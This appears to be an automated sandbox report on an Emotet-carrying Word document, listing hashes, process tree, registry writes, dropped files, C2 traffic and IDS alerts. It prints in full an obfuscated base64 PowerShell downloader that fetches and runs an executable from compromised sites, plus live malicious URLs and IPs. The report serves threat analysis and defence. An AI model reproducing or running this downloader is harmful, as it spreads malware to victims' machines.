File name: | NF-4134254-04232019.doc |
Full analysis: | https://app.any.run/tasks/a03b2a4d-c437-4c08-9e48-57e949af3f28 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 23, 2019, 19:21:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 16:59:00 2019, Last Saved Time/Date: Tue Apr 23 16:59:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0 |
MD5: | EFF81444C7594D9AE0AC2F25F67D74AB |
SHA1: | 9E9C0147EC8C65E96F78327200D31BD6935062A8 |
SHA256: | 02DB4B6F6C8C0AAF709672318CBFA5A36124C67BFA0311F9630C96B227A57146 |
SSDEEP: | 6144:Hh77HUUUUUUUUUUUUUUUUUUUT52VYTL8YPiUmgYN+OW65p5D:Hh77HUUUUUUUUUUUUUUUUUUUTCgYYPtQ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 9 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 9 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:04:23 15:59:00 |
CreateDate: | 2019:04:23 15:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3412 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NF-4134254-04232019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2968 | powershell -e JABuAEEAQQBBAEEAYwA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcANAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAMQB3ACcALAAnAGEAQQAnACkAKQA7ACQAdABBAEEARwBBAFEAQQAgAD0AIAAnADQAMgA3ACcAOwAkAEoAQQBBAGsAQQBYAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBhAEQAYwAnACwAJwBEACcAKQAsACcAVQAnACwAJwBVAF8AJwApADsAJABzAEEAQQBvAFUAWgB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB0AEEAQQBHAEEAUQBBACsAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQAnACwAJwAuAGUAeAAnACkAOwAkAFYAQQBrAHcAWgBCAHcAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAQQBYAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHACcALAAnAFUAawB4ACcAKQAsACcATwAnACkAOwAkAHQAeAA0AFEAeAB4AGMAQQA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAFQAYAAuAFcAZQBiAGAAQwBMAEkARQBuAHQAOwAkAHIAQgB3AHcAeABVAEEAPQAoACIAewA5AH0AewAyADMAfQB7ADIANAB9AHsAMQAyAH0AewAxADQAfQB7ADEAOAB9AHsAMQA5AH0AewAxADYAfQB7ADIAOQB9AHsAMgAyAH0AewA1AH0AewA4AH0AewAzAH0AewAyADcAfQB7ADIAMQB9AHsAMQAwAH0AewAyADgAfQB7ADEANwB9AHsAMgAwAH0AewAzADAAfQB7ADEAMQB9AHsAMQB9AHsAMgB9AHsANwB9AHsAMgA2AH0AewAwAH0AewAyADUAfQB7ADEANQB9AHsANAB9AHsANgB9AHsAMQAzAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAG4ATwAnACwAJwBlAC8AQAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcALwB1ACcALAAnAFMAegBJACcAKQAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAdAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB3ADIALwBAACcALAAnAGgAJwAsACcAdAAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcAA6AC8AJwAsACcALwB0AHIAJwApACkALAAnAGgAdAAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBiACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAYwBvACcALAAnAGUAYQBkAHMALgAnACwAJwBtACcAKQAsACcAaQAnACwAJwB6AGwAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC8AJwAsACcAbABZAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcwBzAGUAJwAsACcAdABzACcAKQAsACcALwBhACcAKQAsACcAYQBqACcALAAnAEAAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwA6AC8AJwAsACcAdABwACcAKQAsACcAaAB0ACcAKQAsACcAOgAvAC8AJwAsACcAbgAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAG4ALgAnACwAJwBjACcALAAnAGEAaQBnACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcALwBRACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAvACcALAAnAFUAUAB2ACcAKQApACwAJwBvACcALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGEAJwAsACcALwBwAGwAJwApACwAJwB1AG0AJwAsACcAdABpAG4AJwApACwAJwBlACcALAAoACIAewAwAH0AewAzAH0AewA0AH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQB2AGkAJwAsACcAawAnACkALAAnAGMAbwAnACwAJwBtAC8AYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB2ACcALAAnAGUAdwBhAGQAJwApACwAJwAuACcAKQAsACcAbQAvACcALAAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AewA0AH0AIgAgAC0AZgAnAHQAcAAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACAAJwBsAC8AJwAsACcAaAB0ACcALAAnAHUAZABlAHMALwBYAFoAJwAsACcAQAAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBpACcALAAnAG4AYwBsACcAKQAsACcAdwBwAC0AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAcwA6AC8AJwAsACcALwAnACkAKQAsACcAZwAnACwAJwBwACcALAAnAG4AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB5AHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBsAGEAJwAsACcAbQBkAGUAcAB1ACcAKQApACwAJwBpAG4AcwAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwA6ACcALAAnAHQAdABwACcAKQAsACcALwAnACwAJwBoACcAKQAsACgAIgB7ADAAfQB7ADMAfQB7ADIAfQB7ADEAfQAiACAALQBmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwB0AC4AYwBvAG0ALwAnACwAJwBhACcALAAnAGUAYwB0ACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwBSAHgAQgAnACwAJwBuACcAKQAsACcAbQBpACcALAAnAGQAJwApACwAJwB0ACcALAAnAGwAYQAnACwAKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsAMAB9AHsANQB9AHsANAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBjAGwAbwAnACwAJwB5AHQAYQBuAGQAdQAnACwAJwBvACcALAAnAG4AZwBhAG4ALgBjACcAKQAsACcAaQAnACwAJwB0ACcALAAnAGMAJwAsACcAbQBpACcALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAHcAcAAtAGEAZAAnACwAJwBtACcALAAnAC8AJwApACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGkAJwAsACcAaQAtAGIAJwApACkALgAiAFMAcABsAGAASQB0ACIAKAAnAEAAJwApADsAJABXAEMAQQBDAEIAawBBADQAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARgBBAEIAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnADQAQgBYACcALAAnAGMAJwApACwAJwBBACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGMAdwBRAEEAVQBYACAAaQBuACAAJAByAEIAdwB3AHgAVQBBACkAewB0AHIAeQB7ACQAdAB4ADQAUQB4AHgAYwBBAC4AIgBkAG8AdwBOAGAAbABvAEEAYABkAEYASQBMAEUAIgAoACQAYwB3AFEAQQBVAFgALAAgACQAcwBBAEEAbwBVAFoAeAApADsAJABVAEEANABBAEEAeABBAEIAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBBACcALAAnAE4AVQBEAEcAJwApACwAJwBBACcAKQAsACcAYwAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAcwBBAEEAbwBVAFoAeAApAC4AIgBsAEUAYABOAGAARwBUAEgAIgAgAC0AZwBlACAAMgA5ADYANQA4ACkAIAB7ACYAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAQQBBAG8AVQBaAHgAOwAkAG0AQQBaAEcAbwB3AD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAQQBBACcALAAnAHEAWgAnACwAJwBVAEcARAAnACkAOwBiAHIAZQBhAGsAOwAkAEYAeABCAFEAbwBBAEQAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcAagAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAFgAJwAsACcAQQB3AFoAJwApACkALAAnAFgARAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHYAQQBBAFUAQQBBAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAQQB3AHcAJwAsACcAMQAnACkALAAnAEwAJwAsACcANAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3404 | "C:\Users\admin\427.exe" | C:\Users\admin\427.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2440 | --9e50537 | C:\Users\admin\427.exe | 427.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3964 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 427.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2732 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | }s |
Value: 7D732000540D0000010000000000000000000000 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1318518814 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518936 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318518937 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 540D0000803885D309FAD40100000000 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | wt |
Value: 77742000540D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | wt |
Value: 77742000540D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3412) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFBCD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8KCGQS4ZYI3UU3Z74X9J.temp | — | |
MD5:— | SHA256:— | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF130581.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
2968 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$-4134254-04232019.doc | pgc | |
MD5:67E58F88A8B2A604345F5FEB7703B21D | SHA256:9074E0B1A519E160ED3582DA2B86C5C0D7729F2751A0405A454BA996AD2D51A1 | |||
3412 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:E28FB0BDEA7644DD84C26E0013DC08A3 | SHA256:70D30C6FD3E3972545E292EF0B9D6E4DCE5ADB0C977147B7F050D14D542DD0FD | |||
2440 | 427.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:0AEB9510C0D69B04E492CE32360F1BFB | SHA256:D192E212101C718C80A36A991D3E967F0E9934A6844CE4907B8B5846693E015A | |||
2968 | powershell.exe | C:\Users\admin\427.exe | executable | |
MD5:0AEB9510C0D69B04E492CE32360F1BFB | SHA256:D192E212101C718C80A36A991D3E967F0E9934A6844CE4907B8B5846693E015A | |||
3412 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BA7B319390117FA84C6C59451D190B6E | SHA256:71415E5341283EAAF35AC141D68A99972E59C842590F1AE513B5A914CCC59FED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2732 | soundser.exe | POST | — | 24.150.44.53:80 | http://24.150.44.53/prep/ | CA | — | — | malicious |
2968 | powershell.exe | GET | 200 | 210.2.64.74:80 | http://lamdepuytinsaigon.com/wp-includes/XZl/ | VN | executable | 78.0 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2968 | powershell.exe | 210.2.64.74:80 | lamdepuytinsaigon.com | Quang Trung Software City Development Company | VN | suspicious |
2732 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
Domain | IP | Reputation |
---|---|---|
lamdepuytinsaigon.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2968 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2968 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2968 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2732 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |